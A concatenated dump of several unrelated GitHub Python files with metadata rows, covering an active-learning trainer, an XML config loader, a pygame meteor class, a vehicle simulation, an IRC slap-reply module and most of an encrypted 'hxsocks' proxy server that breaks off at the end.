batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
# call the dsc update
for count in range(args.al_args.training_args.num_adv_steps):
dsc_output = update_model(engine, model, batch, step="dsc")
# sample new batch if needed to train the adversarial network
if count < (args.al_args.training_args.num_adv_steps - 1):
batch = next(train_datacycler)
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
return {**task_output, **vae_output, **dsc_output}
return Engine(training_step)
@classmethod
def setup_model(
cls,
args: Arguments,
datamodule: BaseDataModule,
tb_logger: TensorboardLogger,
summarize: bool = False,
stage: TrainingStage = TrainingStage.train,
) -> XAIModel:
"""
Initializes the model for training.
"""
from xai_torch.core.models.factory import ModelFactory
# setup model
model = ModelFactory.create(args, datamodule, tb_logger=tb_logger, wrapper_class=VAALXAIModel)
model.setup(stage=stage)
# generate model summary
if summarize:
model.summarize()
return model
@classmethod
def train(cls, local_rank, args: Arguments):
"""
Initializes the training of a model given dataset, and their configurations.
"""
import ignite.distributed as idist
from xai_torch.core.training.utilities import initialize_training, setup_logging
from xai_torch.utilities.logging_utils import DEFAULT_LOGGER_NAME, setup_logger
# setup logging
logger = setup_logger(DEFAULT_LOGGER_NAME, distributed_rank=local_rank, level=logging.INFO)
# initialize training
initialize_training(args)
# initialize torch device (cpu or gpu)
device = idist.device()
# get device rank
rank = idist.get_rank()
# initialize logging directory and tensorboard logger
output_dir, tb_logger = setup_logging(args)
# setup datamodule
datamodule: ActiveLearningDataModule = cls.setup_datamodule(args, rank=rank, stage=None)
# setup model
model = cls.setup_model(args, datamodule, tb_logger, summarize=True)
# define active learning query strategy
query_strategy: QueryStrategy = QueryStrategyFactory.create(
datamodule=datamodule, model=model, device=device, args=args.al_args
)
# load active learning state
al_state = DALTrainer.load_round_state(0, datamodule, output_dir=output_dir)
curr_round = al_state["curr_round"]
if curr_round == args.al_args.n_rounds:
logger.warning(
"Active learning rounds have already been finished! Either increase the number of "
f"max rounds (current={args.al_args.n_rounds}) "
"OR reset the training from start."
)
exit()
# reset seeds for training. This allows multiple experiments with same seed for dataset initialization but
# different seeds for the active learning training process.
reset_random_seeds(args.al_args.al_seed)
while curr_round < args.al_args.n_rounds:
from al.core.training.query_strategies.impl.ceal import CEAL
logger.info(f"============== Running round={curr_round} of active learning ===========")
# update tblogger dir
tb_logger = None
if rank == 0:
from ignite.contrib.handlers import TensorboardLogger
tb_logger = TensorboardLogger(output_dir / str(curr_round))
# print labels summary
datamodule.print_label_summary()
# Reset model for re-training
if args.al_args.reset_model:
model = cls.setup_model(args, datamodule, tb_logger, summarize=False)
else:
# Reset only optimizers and schedulers
model._opt_sch_handler.setup_opt_sch()
# get train dataloader for labelled data
joint_dataloader = datamodule.get_joint_dataset_loader(
collate_fn=JointBatchToTensorDataCollator(datamodule._collate_fns.train)
)
# get validation data loader
val_dataloader = datamodule.val_dataloader()
# setup training engine
training_engine, _ = cls.setup_training_engine(
args=args,
model=model,
train_dataloader=joint_dataloader,
val_dataloader=val_dataloader,
output_dir=output_dir / str(curr_round), # append round number to output_dir
tb_logger=tb_logger,
device=device,
)
training_engine.logger = logger
resume_epoch = training_engine.state.epoch
if not (training_engine._is_done(training_engine.state) or resume_epoch >= args.training_args.max_epochs):
# run training
training_engine.run(range(len(joint_dataloader)), max_epochs=args.training_args.max_epochs)
# training_engine.run(labeled_dataloader, max_epochs=args.training_args.max_epochs)
# after the training, the test engine automatically loads the 'best' model to continue the rounds.
test_dataloader = datamodule.test_dataloader()
# run testing after the end of every round
test_engine = cls.setup_test_engine(
args=args,
model=model,
test_dataloader=test_dataloader,
output_dir=output_dir / str(curr_round),
tb_logger=tb_logger,
device=device,
)
test_engine.logger = logger
test_engine.run(test_dataloader)
else:
# if we are resuming from last checkpoint and training is already finished
logger.info(
"Training has already been finished! Either increase the number of "
f"epochs (current={args.training_args.max_epochs}) >= {resume_epoch} "
"OR reset the training from start."
)
# after the training, the test engine automatically loads the 'best' model to continue the rounds.
test_dataloader = datamodule.test_dataloader()
# don't run test but just set it up so that model has latest correct checkpoint loaded
test_engine = cls.setup_test_engine(
args=args,
model=model,
test_dataloader=test_dataloader,
output_dir=output_dir / str(curr_round),
tb_logger=tb_logger,
device=device,
)
# NOTE: The test engine has already updated the model state with state of last/best
# checkpoint which will be used for querying of the next round.
def perform_query():
import timeit
# reset the querying strategy
query_strategy.reset(model)
# update the labeled pool
start = timeit.default_timer()
n_query_samples = int(args.al_args.n_query_ratio * datamodule.pool_size)
if isinstance(query_strategy, CEAL):
query_indices = query_strategy.query(n_samples=n_query_samples, round=curr_round)
else:
query_indices = query_strategy.query(n_samples=n_query_samples)
stop = timeit.default_timer()
tb_logger.writer.add_scalar("query_time", stop - start, curr_round)
datamodule.update_dataset_labels(query_indices)
# perform query
perform_query()
# save active learning query state for next round
DALTrainer.save_round_state(curr_round + 1, datamodule, output_dir=output_dir)
if rank == 0:
# close tb logger
tb_logger.close()
curr_round += 1
| saifullah3396/doc_al | src/al/core/training/vaal_trainer.py | vaal_trainer.py | py | 15,573 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "logging.basicConfig",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "al.core.tr... |
35396368561 | #!/usr/bin/env python3
# coding=utf-8
import xml.dom.minidom as xmldom
import os
class Appconfig(object):
AppCode=""
#AppType=""
Icon=""
Version=""
PathType=""
Path=""
Arguments=""
AppStartupType=""
def __init__(self,appCode,icon,version,pathType,path,arguments,appStartupType):
self.AppCode=appCode
self.Icon=icon
self.Version=version
self.PathType=pathType
self.Path=path
self.Arguments=arguments
self.AppStartupType=appStartupType
class AppConfigure(object):
Appconfigs = []
def __init__(self):
super().__init__()
self.Appconfigs.clear()
def loadConf(self,filepath):
self.Appconfigs.clear()
if not os.path.isfile(filepath):
return
domTree = xmldom.parse(filepath)
rootNode = domTree.documentElement
apps=rootNode.getElementsByTagName("AppConfig")
for app in apps:
if app.hasAttribute("AppCode"):
appCode = app.getAttribute("AppCode")
icon = app.getAttribute("Icon")
version = app.getAttribute("Version")
pathType = app.getAttribute("PathType")
path = app.getAttribute("Path")
arguments = app.getAttribute("Arguments")
appStartupType = app.getAttribute("AppStartupType")
self.Appconfigs.append(Appconfig(appCode,icon,version,pathType,path,arguments,appStartupType))
| LeeZhang1979/UniTools | conf/AppConfigure.py | AppConfigure.py | py | 1,538 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.isfile",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "xml.dom.minidom.parse",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "xml.dom.minidom",
... |
2343066126 | import pygame
import Config
import random
import math
import entities
from entity import Entity
class Meteor(Entity):
def __init__(self, img):
self.x = random.randint(0, Config.WIDTH)
self.y = 0
self.size = random.randint(20, 65)
self.speed = random.randint(3, 5)
self.damage = self.size * self.speed / 10
self.mass = self.size ** 2
self.kineticStrong = self.mass * self.speed
self.startPosition = (self.x, self.y)
self.img = pygame.transform.rotate(pygame.transform.scale(img, (self.size, self.size)), random.randint(0, 360))
self.direction = random.choice([random.randint(-180, -100), random.randint(100, 180)])
self.isAlive = True
self.radius = 47
self.maxhealth = self.size * 3
self.health = self.maxhealth
self.baseRotation = random.randint(1, 10)
self.contacts = []
def render(self, window):
self.move()
self.draw(window)
self.checkBorders()
self.checkBeat()
self.checkHealth()
self.updateContacts()
def updateContacts(self):
clone = self.contacts.copy()
for contact in clone:
if contact[1] < 1000 / Config.FPS:
self.contacts.remove(contact)
else: contact[1] -= 1000 / Config.FPS
def checkBeat(self):
clone = entities.entities.copy()
for entity in clone:
if not isinstance(entity, Meteor) and entity.checkCollision((self.x, self.y)):
entity.takeDamage(self.damage)
self.diy()
elif isinstance(entity, Meteor) and entity.checkCollisionWithAnotherMeteor(self) and entity != self:
isContacted = False
for contact in self.contacts:
if contact[0] == entity: isContacted = True
if not isContacted:
entity.beat(self)
self.beat(entity)
def beat(self, another):
self.contacts.append([another, 500])
def getDifferenceBetweenDegrees(deg1, deg2):
if deg1 < 0: deg1 = 360 + deg1
if deg2 < 0: deg2 = 360 + deg2
return deg1 - deg2
aks = another.kineticStrong
self.direction += getDifferenceBetweenDegrees(self.direction, another.direction) * (self.kineticStrong + aks) / aks
self.fixDirection()
def checkCollisionWithAnotherMeteor(self, another):
return math.sqrt(abs(another.x - self.x) ** 2 + abs(another.y - self.y) ** 2) <= self.radius + another.radius
def fixDirection(self):
while self.direction > 180:
self.direction += -360
while self.direction < -180:
self.direction += 360
def draw(self, window):
window.blit(self.img, (self.x, self.y))
def diy(self):
self.addDeathParticles()
self.isAlive = False
def move(self):
self.fixDirection()
def reverse(deg):
if deg > 90: return 180 - deg
if deg < -90: return -180 - deg
d = self.direction
movementX = 0
movementY = 0
if d <= 90 and d >= -90:
movementX = self.speed * -d / 90
else:
movementX = self.speed * -reverse(d) / 90
if d >= 0:
movementY = self.speed * (90 - d) / 90
elif d < 0:
movementY = self.speed * (90 + d) / 90
self.x += movementX
self.y -= movementY
def checkBorders(self):
if self.x > Config.WIDTH + self.size or self.x < -self.size:
self.isAlive = False
if self.y > Config.HEIGHT + self.size or self.y < -self.size:
self.isAlive = False
def checkHealth(self):
if self.health <= 0:
self.diy()
def addDeathParticles(self):
entities.effects.explosionEffect((self.x, self.y))
| Krakozaybr/Meteorro | cooperate/meteor.py | meteor.py | py | 3,997 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "entity.Entity",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "Config.WIDTH",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"l... |
42822681247 | from math import dist, inf
from typing import Optional
from random import random, choice
from aasd.vehicle import Vehicle, VehicleType
class Environment:
def __init__(self, width: int = 1280, height: int = 720, object_size: int = 10, chance_to_crash: float = 0.001):
self.width = width
self.height = height
self.obj_size: int = object_size
self.vehicles: list[Vehicle] = []
self.chance_to_crash: float = chance_to_crash
def register_vehicle(self, vehicle: Vehicle):
self.vehicles.append(vehicle)
def unregister_vehicle(self, vehicle: Vehicle):
self.vehicles.remove(vehicle)
def get_emergency_vehicles(self) -> list[Vehicle]:
return [
vehicle
for vehicle in self.vehicles
if vehicle.type is VehicleType.Emergency
]
def get_nearby_vehicles(self, caller: Vehicle, radius: float):
return [
vehicle
for vehicle in self.vehicles
if is_nearby(vehicle, caller, radius) and vehicle is not caller
]
def get_random_coordinates(self) -> tuple[float, float]:
x = random() * self.width + 5
y = random() * self.height + 5
if x > self.width:
x = float(self.width)
if y > self.height:
y = float(self.height)
return x, y
def move_vehicles(self):
for vehicle in self.vehicles:
vehicle.move(self.width - self.obj_size, self.height - self.obj_size)
def make_random_accident(self) -> str:
vehicle = choice(self.vehicles)
vehicle.type = VehicleType.Crashed
return vehicle.id
def get_vehicle(self, vehicle_id: str) -> Optional[Vehicle]:
for vehicle in self.vehicles:
if vehicle.id == vehicle_id:
return vehicle
else:
return None
def get_closest_emergency_vehicle(self, x: float, y: float):
emergency_vehicles = [v for v in self.vehicles if v.type is VehicleType.Emergency]
closest_ev = None
lowest_distance = inf
for ev in emergency_vehicles:
distance = dist(ev.get_coordinates(), (x, y))
if distance < lowest_distance:
lowest_distance = distance
closest_ev = ev
return closest_ev
def are_vehicles_nearby(self, id1: str, id2: str, radius: float) -> bool:
return is_nearby(self.get_vehicle(id1), self.get_vehicle(id2), radius)
def is_nearby(vehicle1: Optional[Vehicle], vehicle2: Optional[Vehicle], radius: float) -> bool:
if vehicle1 is None or vehicle2 is None:
return False
return dist(vehicle1.get_coordinates(), vehicle2.get_coordinates()) <= radius
| Pruxon/AASD | aasd/environment.py | environment.py | py | 2,733 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "aasd.vehicle.Vehicle",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "aasd.vehicle.Vehicle",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "aasd.vehicle.Vehicle",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "aasd.v... |
36173205593 | import random
import json
import znc
class slapanswer(znc.Module):
description = 'Answer slaps'
module_types = [znc.CModInfo.NetworkModule]
def OnLoad(self, args, message):
self.default_answers = [
'"Be kind whenever possible. It is always possible." - Dalai Lama',
'"Where ignorance is our master, there is no possibility of real'
' peace." - Dalai Lama',
'"We can never obtain peace in the outer world until we make peace'
' with ourselves." - Dalai Lama',
'"An eye for an eye will only make the whole world blind."'
' - Mahatma Gandhi',
'"The best fighter is never angry" - Lao Tzu',
'"Peace cannot be achieved through violence, it can only be'
' attained through understanding." - Ralph Waldo Emerson',
'"Silence is sometimes the best answer" - Dalai Lama',
]
if 'answers' in self.nv:
self.ANSWERS = json.loads(self.nv['answers'])
else:
self.ANSWERS = self.default_answers
self.save_answers()
return True
def OnModCommand(self, cmd):
split = cmd.split()
command = str(split[0]).lower()
args = [a.lower() for a in split[1:]]
if command == 'help':
self.command_help()
elif command == 'add':
self.command_add(args)
elif command == 'remove':
self.command_remove(args)
elif command == 'reset':
self.command_reset()
elif command == 'list':
self.command_list()
def save_answers(self):
self.nv['answers'] = json.dumps(self.ANSWERS)
def command_help(self):
self.PutModule('\n'.join([
'add <msg> | add a msg (replace nick with {nick})',
'remove <id> | remove msg with id <id> (get id\'s with "list")',
'reset | reset msgs to default',
'list | get a list with msgs'
]))
return True
def command_add(self, args):
msg = ' '.join(args)
if '\n' in msg:
self.PutModule('ERROR: Line-Breaks are not allowed in answers!')
return True
self.ANSWERS.append(msg)
self.save_answers()
self.PutModule('Successfully added answer!')
return True
def command_remove(self, args):
try:
answer_id = int(args[0])
except ValueError:
self.PutModule('ERROR: Invalid ID!')
if answer_id < len(self.ANSWERS) and answer_id >= 0:
del self.ANSWERS[answer_id]
self.save_answers()
self.PutModule('Successfully removed answer!')
else:
self.PutModule(
'ERROR: Invalid ID! Try "list" for a list of id\'s!'
)
return True
def command_reset(self):
self.ANSWERS = self.default_answers
self.save_answers()
self.PutModule('Successfully reset answers!')
return True
def command_list(self):
for index, value in enumerate(self.ANSWERS):
self.PutModule('{} | {}'.format(index, value))
return True
def OnChanAction(self, invoker, channel, message):
own_nick = self.GetNetwork().GetIRCNick().GetNick()
own_host = self.GetNetwork().GetIRCNick().GetHostMask()
nick = invoker.GetNick()
channel = channel.GetName()
msg = str(message)
if 'slap' in msg and own_nick in msg:
self.answer_slap(channel, nick, own_host)
return znc.CONTINUE
def answer_slap(self, channel, nick, own_host):
msg = random.choice(self.ANSWERS)
if '{nick}' in msg:
msg = msg.format(nick=nick)
msg = 'PRIVMSG {channel} :{msg}'.format(channel=channel, msg=msg)
self.GetNetwork().PutIRC(msg)
self.GetNetwork().PutUser(':{own_host} {msg}'.format(
own_host=own_host, msg=msg))
| Thor77/SlapAnswer | slapanswer.py | slapanswer.py | py | 3,958 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "znc.Module",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "znc.CModInfo",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "json.loads",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_num... |
32365176970 | from __future__ import with_statement
import os
import sys
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import errno
import socket
import threading
import time
import random
import select
import SocketServer
import struct
import hashlib
import hmac
import logging
import io
import json
import urlparse
import traceback
from collections import defaultdict, deque
from util import create_connection, get_ip_address, parse_hostport
import encrypt
from encrypt import compare_digest
from ecc import ECC
__version__ = '0.0.1'
DEFAULT_METHOD = 'aes-128-cfb'
DEFAULT_HASH = 'sha256'
MAC_LEN = 16
CTX = b'hxsocks'
USER_PASS = {'user': 'pass'}
SERVER_CERT = None
class KeyManager:
userpkeys = defaultdict(deque)
pkeyuser = {}
pkeykey = {}
pkeytime = {}
@classmethod
def create_key(cls, user, client_pkey, klen):
if cls.notvalid(user, client_pkey):
return 0, 0
if len(cls.userpkeys[user]) > 3:
cls.del_key(cls.userpkeys[user][0])
dh = ECC(klen)
shared_secret = dh.get_dh_key(client_pkey)
client_pkey = hashlib.md5(client_pkey).digest()
cls.userpkeys[user].append(client_pkey)
cls.pkeyuser[client_pkey] = user
cls.pkeykey[client_pkey] = shared_secret
cls.pkeytime[client_pkey] = time.time()
return dh.get_pub_key(), USER_PASS[user]
@classmethod
def notvalid(cls, user, client_pkey):
return hashlib.md5(client_pkey).digest() in cls.pkeyuser
@classmethod
def check_key(cls, pubk):
if pubk not in cls.pkeykey:
return 1
if cls.pkeytime[pubk] < time.time() - 6 * 3600:
cls.del_key(pubk)
return 1
@classmethod
def del_key(cls, pkey):
user = cls.pkeyuser[pkey]
del cls.pkeyuser[pkey]
del cls.pkeytime[pkey]
del cls.pkeykey[pkey]
cls.userpkeys[user].remove(pkey)
@classmethod
def get_user_by_pubkey(cls, pubkey):
return cls.pkeyuser[pubkey]
@classmethod
def get_skey_by_pubkey(cls, pubkey):
return cls.pkeykey[pubkey]
class HXSocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, serverinfo, forward, RequestHandlerClass, bind_and_activate=True):
self.serverinfo = serverinfo
self.forward = set(forward)
p = urlparse.urlparse(serverinfo)
if p.scheme == 'ss':
self.PSK, self.method = p.password, p.username
elif p.scheme == 'hxs':
self.PSK = urlparse.parse_qs(p.query).get('PSK', [''])[0]
self.method = urlparse.parse_qs(p.query).get('method', [DEFAULT_METHOD])[0]
else:
raise ValueError('bad serverinfo: {}'.format(self.serverinfo))
q = urlparse.parse_qs(p.query)
proxy = q.get('proxy', [''])[0]
self.proxy = parse_hostport(proxy) if proxy else None
self.server = q.get('UA', ['nginx/1.2.2'])[0]
self.hash_algo = q.get('hash', [DEFAULT_HASH])[0].upper()
self.ss = self.PSK and q.get('ss', ['1'])[0] == '1'
addrs = socket.getaddrinfo(p.hostname, p.port)
if not addrs:
raise ValueError('cant resolve listen address')
self.address_family = addrs[0][0]
server_address = (p.hostname, p.port)
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
class HXSocksHandler(SocketServer.StreamRequestHandler):
timeout = 10
bufsize = 1024 * 16
def handle(self):
try:
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
pskcipher = encrypt.Encryptor(self.server.PSK, self.server.method)
self.connection.settimeout(self.timeout)
data = self.rfile.read(pskcipher.iv_len)
pskcipher.decrypt(data)
while True:
try:
data = self.rfile.read(1)
self.connection.settimeout(self.timeout)
cmd = ord(pskcipher.decrypt(data))
except Exception as e:
logging.error('cmd Exception: server %s %r from %s:%s' % (self.server.server_address[1], e, self.client_address[0], self.client_address[1]))
break
if cmd == 10: # client key exchange
rint = random.randint(64, 255)
req_len = pskcipher.decrypt(self.rfile.read(2))
req_len = struct.unpack('>H', req_len)[0]
data = pskcipher.decrypt(self.rfile.read(req_len))
data = io.BytesIO(data)
ts = data.read(4)
if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
# possible replay attack
logging.error('bad timestamp. client_ip: %s' % self.client_address[0])
break
pklen = ord(data.read(1))
client_pkey = data.read(pklen)
client_auth = data.read(32)
def _send(data):
data = struct.pack('>H', len(data)) + data
self.wfile.write(pskcipher.encrypt(data))
client = None
for user, passwd in USER_PASS.items():
h = hmac.new(passwd.encode(), ts + client_pkey + user.encode(), hashlib.sha256).digest()
if compare_digest(h, client_auth):
client = user
break
else:
logging.error('user not found. client_ip: %s' % self.client_address[0])
break
pkey, passwd = KeyManager.create_key(client, client_pkey, pskcipher.key_len)
if pkey:
logging.info('new key exchange. client: %s, ip: %s' % (client, self.client_address[0]))
h = hmac.new(passwd.encode(), client_pkey + pkey + client.encode(), hashlib.sha256).digest()
scert = SERVER_CERT.get_pub_key()
signature = SERVER_CERT.sign(h, self.server.hash_algo)
data = chr(0) + chr(len(pkey)) + chr(len(scert)) + chr(len(signature)) + pkey + h + scert + signature + os.urandom(rint)
_send(data)
continue
else:
logging.error('Private_key already registered. client: %s, ip: %s' % (client, self.client_address[0]))
# KeyManager.del_key(hashlib.md5(client_pkey).digest())
break
elif cmd == 11: # a connect request
client_pkey = pskcipher.decrypt(self.rfile.read(16))
rint = random.randint(64, 2048)
def _send(code, cipher):
if code == 1:
data = os.urandom(rint)
data = pskcipher.encrypt(struct.pack('>H', rint)) + data
self.wfile.write(data)
else:
ct = cipher.encrypt(chr(code) + os.urandom(rint-1))
data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
self.wfile.write(data)
if KeyManager.check_key(client_pkey):
logging.error('client key not exist or expired. client ip: %s' % self.client_address[0])
ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
self.rfile.read(ctlen)
_send(1, None)
continue
user = KeyManager.get_user_by_pubkey(client_pkey)
cipher = encrypt.AEncryptor(KeyManager.get_skey_by_pubkey(client_pkey), self.server.method, CTX)
ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
ct = self.rfile.read(ctlen)
data = cipher.decrypt(ct)
buf = io.BytesIO(data)
ts = buf.read(4)
if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
logging.error('bad timestamp, possible replay attrack. client ip: %s' % self.client_address[0])
# KeyManager.del_key(client_pkey)
# _send(1, None)
break
host_len = ord(buf.read(1))
addr = buf.read(host_len)
port = struct.unpack('>H', buf.read(2))[0]
if self._request_is_loopback((addr, port)) and port not in self.server.forward:
logging.info('server %d access localhost:%d denied. from %s:%d, %s' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1], user))
_send(2, cipher)
continue
try:
logging.info('server %d request %s:%d from %s:%d, %s' % (self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1], user))
remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
_send(0, cipher)
# self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except (IOError, OSError) as e: # Connection refused
logging.warning('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
_send(2, cipher)
continue
if self.forward_tcp(self.connection, remote, cipher, pskcipher, timeout=60):
break
self.connection.settimeout(60)
logging.debug('hxsocks connect reusable, except next connection')
elif cmd in (1, 3, 4, 17, 19, 20):
# A shadowsocks request
if not self.server.ss:
logging.warning('shadowsocks not enabled for this server. port: %d' % self.server.server_address[1])
break
ota = cmd & 16
if cmd & 15 == 1:
_addr = pskcipher.decrypt(self.rfile.read(4))
addr = socket.inet_ntoa(_addr)
elif cmd & 15 == 3:
_addr = pskcipher.decrypt(self.rfile.read(1))
addr = pskcipher.decrypt(self.rfile.read(ord(_addr)))
_addr += addr
elif cmd & 15 == 4:
_addr = socket.AF_INET6, pskcipher.decrypt(self.rfile.read(16))
addr = socket.inet_ntop(_addr)
port = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
# verify
if ota:
header = chr(cmd) + _addr + struct.pack('>H', port)
self._ota_chunk_idx = 0
rmac = pskcipher.decrypt(self.rfile.read(10))
key = pskcipher.decipher_iv + pskcipher.key
mac = hmac.new(key, header, hashlib.sha1).digest()[:10]
if not compare_digest(rmac, mac):
logging.error("OTA Failed!!")
break
if self._request_is_loopback((addr, port)) and port not in self.server.forward:
logging.info('server %d access localhost:%d denied. from %s:%d' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1]))
break
try:
remote = None
logging.info('server %d SS request %s:%d from %s:%d %s' % (self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1], 'with ota' if ota else ''))
remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
if ota:
return self.ssforward_tcp_ota(self.connection, remote, pskcipher, timeout=60)
return self.ssforward_tcp(self.connection, remote, pskcipher, timeout=60)
except (IOError, OSError) as e: # Connection refused
logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
return
else:
logging.warning('unknown cmd %d, bad encryption key?' % cmd)
break
ins, _, _ = select.select([self.connection], [], [], 1)
while ins:
data = self.connection.recv(self.bufsize)
if not data:
break
ins, _, _ = select.select([self.connection], [], [], 1)
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
def forward_tcp(self, local, remote, cipher, pskcipher, timeout=60):
readable = 1
writeable = 1
closed = 0
close_count = 0
fds = [local, remote]
total_send = 0
try:
while fds:
if len(fds) < 2:
timeout = 3
ins, _, _ = select.select(fds, [], [], timeout)
if not ins:
logging.debug('timed out')
close_count += 1
if remote in fds:
fds.remove(remote)
remote.shutdown(socket.SHUT_RD)
if writeable:
padding_len = random.randint(8, 255)
data = chr(padding_len) + b'\x00' * padding_len
ct = cipher.encrypt(data)
data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(data)
writeable = 0
if close_count > 2:
break
if local in ins:
ct_len = self.rfile.read(2)
if not ct_len:
logging.debug('client closed')
fds.remove(local)
remote.shutdown(socket.SHUT_WR)
closed = 1
else:
ct_len = struct.unpack('>H', pskcipher.decrypt(ct_len))[0]
ct = self.rfile.read(ct_len)
data = cipher.decrypt(ct)
pad_len = ord(data[0])
cmd = ord(data[-1])
if 0 < pad_len < 8:
# fake chunk, drop
if pad_len == 1 and writeable:
_data = chr(2) + b'\x00' * random.randint(1024, 8196)
ct = cipher.encrypt(_data)
_data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(_data)
else:
data = data[1:0-pad_len] if pad_len else data[1:]
if data:
remote.sendall(data)
else:
logging.debug('client close, gracefully')
if cmd:
remote.close()
else:
remote.shutdown(socket.SHUT_WR)
fds.remove(local)
readable = 0
if remote in ins:
data = remote.recv(self.bufsize)
if not data:
writeable = 0
fds.remove(remote)
if total_send < 8196 and random.random() < 0.5:
_data = chr(2) + b'\x00' * random.randint(1024, 8196)
ct = cipher.encrypt(_data)
_data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(_data)
# if writeable and readable and not closed and random.random() < 0.1:
# # request fake chunk
# _data = chr(1) + b'\x00' * random.randint(1024, 8196)
# ct = cipher.encrypt(_data)
# _data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
# local.sendall(_data)
total_send += len(data)
padding_len = random.randint(8, 255)
data = chr(padding_len) + data + b'\x00' * padding_len
ct = cipher.encrypt(data)
data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
local.sendall(data)
if closed:
break
except socket.timeout:
pass
except (OSError, IOError) as e:
if e.args[0] in (errno.EBADF,):
return
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
finally:
try:
remote.close()
except (OSError, IOError):
pass
self.connection.settimeout(600)
return readable + writeable
def ssforward_tcp(self, local, remote, cipher, timeout=60):
try:
while 1:
ins, _, _ = select.select([local, remote], [], [], timeout)
if not ins:
break
if local in ins:
data = local.recv(self.bufsize)
if not data:
break
remote.sendall(cipher.decrypt(data))
if remote in ins:
data = remote.recv(self.bufsize)
if not data:
break
local.sendall(cipher.encrypt(data))
except socket.timeout:
pass
except (OSError, IOError) as e:
if e.args[0] in (errno.EBADF,):
return
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
finally:
for sock in (remote, local):
try:
sock.close()
except (OSError, IOError):
pass
def ssforward_tcp_ota(self, local, remote, cipher, timeout=60):
try:
while 1:
ins, _, _ = select.select([local, remote], [], [], timeout)
if not ins:
break
if local in ins:
data_len = struct.unpack('>H', cipher.decrypt(self.rfile.read(2)))[0]
rmac = cipher.decrypt(self.rfile.read(10))
data = cipher.decrypt(self.rfile.read(data_len))
index = struct.pack('>I', self._ota_chunk_idx)
key = cipher.decipher_iv + index
mac = hmac.new(key, data, hashlib.sha1).digest()[:10]
if encrypt.compare_digest(rmac, mac):
self._ota_chunk_idx += 1
remote.sendall(data)
else:
logging.warning('OTA Failed')
if remote in ins:
data = remote.recv(self.bufsize)
if not data:
break
local.sendall(cipher.encrypt(data))
except socket.timeout:
pass
except (OSError, IOError) as e:
if e.args[0] in (errno.EBADF,):
return
if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.ENOTCONN, errno.EPIPE):
raise
except Exception as e:
logging.error(repr(e))
logging.error(traceback.format_exc())
finally:
for sock in (remote, local):
try:
sock.close()
except (OSError, IOError):
pass
def _request_is_loopback(self, req):
try:
return get_ip_address(req[0]).is_loopback
except Exception:
pass
def start_servers(config, forward):
for serverinfo in config:
try:
logging.info('starting server: %s' % serverinfo)
ssserver = HXSocksServer(serverinfo, forward, HXSocksHandler)
threading.Thread(target=ssserver.serve_forever).start()
except Exception as e:
logging.error('something wrong with config: %r' % e)
def main():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
hello = 'hxsocks-server %s' % __version__
if gevent:
hello += ' with gevent %s' % gevent.__version__
print(hello)
print('by v3aqb')
global SERVER_CERT
try:
SERVER_CERT = ECC(from_file=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'cert.pem'))
except:
logging.warning('server cert not found, creating...')
